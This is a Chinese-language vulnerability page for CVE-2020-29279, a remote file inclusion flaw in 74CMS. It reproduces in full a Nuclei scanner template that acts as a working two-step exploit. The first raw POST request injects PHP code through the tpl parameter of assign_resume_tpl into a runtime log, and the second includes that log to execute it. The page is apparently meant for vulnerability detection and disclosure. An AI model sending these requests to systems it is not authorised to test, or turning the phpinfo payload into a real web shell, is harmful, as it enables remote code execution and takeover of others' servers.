CVE-2020-29279: 74CMS - Remote File Inclusion

日期: 2025-08-01 | 影响软件: 74CMS | POC: 已公开

漏洞描述

PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.

PoC代码[已公开]

id: CVE-2020-29279

info:
  name: 74CMS - Remote File Inclusion
  author: DhiyaneshDK
  severity: critical
  description: |
    PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution.
  impact: |
    Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 6.0.48 or later.
  reference:
    - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/74cms/74cms%20v6.0.48%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5%2B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABgetshell.md
    - https://www.wangan.com/p/7fyg8ka5a6f81cb6
    - https://cloud.tencent.com/developer/article/1856739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29279
    epss-score: 0.49028
    epss-percentile: 0.97638
    cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: 74cms
    product: 74cms
    fofa-query: app="骑士-74CMS"
  tags: cve,cve2020,74cms,rce,intrusive,file-upload,vkev,vuln

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=<?php phpinfo(); echo md5("{{num}}");ob_flush();?>

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "ThinkPHP")'
        condition: and
        internal: true

  - raw:
      - |
        POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        variable=1&tpl=data/Runtime/Logs/Home/{{replace(date_time("%Y"), "20", "")}}_{{date_time("%M_%D",unix_time())}}.log

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Version"
          - "{{md5(num)}}"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022008d318b22ffc2fc3ac37c6630cbd1d2bdd6a5b6b11d4f2681648a26bc781ebc1022100f0754e8c35c7900b108360162010780b91e207f9c248325de6a8f21de4dcfed4:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29279.yaml

相关漏洞推荐